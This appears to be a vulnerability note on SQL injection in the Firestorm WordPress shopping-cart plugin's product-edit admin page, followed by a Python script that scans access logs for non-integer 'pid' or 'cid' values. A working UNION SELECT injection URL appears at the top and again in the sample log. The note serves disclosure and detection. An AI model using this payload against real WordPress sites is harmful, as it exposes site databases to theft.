EPSS percentile: 55.9%
`$_POST['pid']` is not escaped. The URL is accessible to an administrator user. Affected URL: http://localhost:1406/wp/wp-admin/admin.php?page=fssc-products&fp=general&f=edit&cid=0&pid=0
http://target/wp-admin/admin.php?page=fssc-products&fp=general&f=edit&cid=0&pid=0+UNION+SELECT+name+FROM+wp_terms+WHERE+term_id=1
lenonleite.com.br/en/blog/2016/11/10/firestorm-shopping-cart-ecommerce-plugin-2-07-02-for-wordpress/
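
For defenders reviewing web-server logs, the following added example (not code from the plugin or from the referenced write-up) flags requests to the `fssc-products` admin page whose `pid` or `cid` query parameter is not a plain integer. The combined log format, the sample lines and the function names are assumptions; values sent only in a POST body do not appear in access logs and are not covered.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (assumed combined log format), not real traffic.
SAMPLE_LOG = """\
198.51.100.7 - - [10/Nov/2016:10:00:01 +0000] "GET /wp-admin/admin.php?page=fssc-products&fp=general&f=edit&cid=0&pid=12 HTTP/1.1" 200 5120
198.51.100.7 - - [10/Nov/2016:10:00:09 +0000] "GET /wp-admin/admin.php?page=fssc-products&fp=general&f=edit&cid=0&pid=0+UNION+SELECT+name+FROM+wp_terms+WHERE+term_id=1 HTTP/1.1" 200 5342
203.0.113.4 - - [10/Nov/2016:10:01:30 +0000] "GET /wp-admin/admin.php?page=other-plugin&pid=abc HTTP/1.1" 200 812
198.51.100.9 - - [10/Nov/2016:10:02:00 +0000] "GET /wp/wp-admin/admin.php?page=fssc-products&f=edit&cid=1%27&pid=3 HTTP/1.1" 200 5100
"""

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')
INTEGER_RE = re.compile(r"[0-9]+")
NUMERIC_PARAMS = ("pid", "cid")  # ids the edit screen is assumed to expect as integers


def suspicious_params(target):
    """Return {param: decoded value} for non-integer ids sent to fssc-products."""
    parts = urlsplit(target)
    if not parts.path.endswith("/wp-admin/admin.php"):
        return {}
    query = parse_qs(parts.query, keep_blank_values=True)
    if query.get("page") != ["fssc-products"]:
        return {}
    return {name: value
            for name in NUMERIC_PARAMS
            for value in query.get(name, [])
            if not INTEGER_RE.fullmatch(value)}


def scan(log_text):
    """Return a list of (client_ip, {param: value}) for flagged requests."""
    findings = []
    for line in log_text.splitlines():
        match = REQUEST_RE.match(line)
        if not match:
            continue
        bad = suspicious_params(match.group(2))
        if bad:
            findings.append((match.group(1), bad))
    return findings


if __name__ == "__main__":
    for client, params in scan(SAMPLE_LOG):
        print(client, params)
```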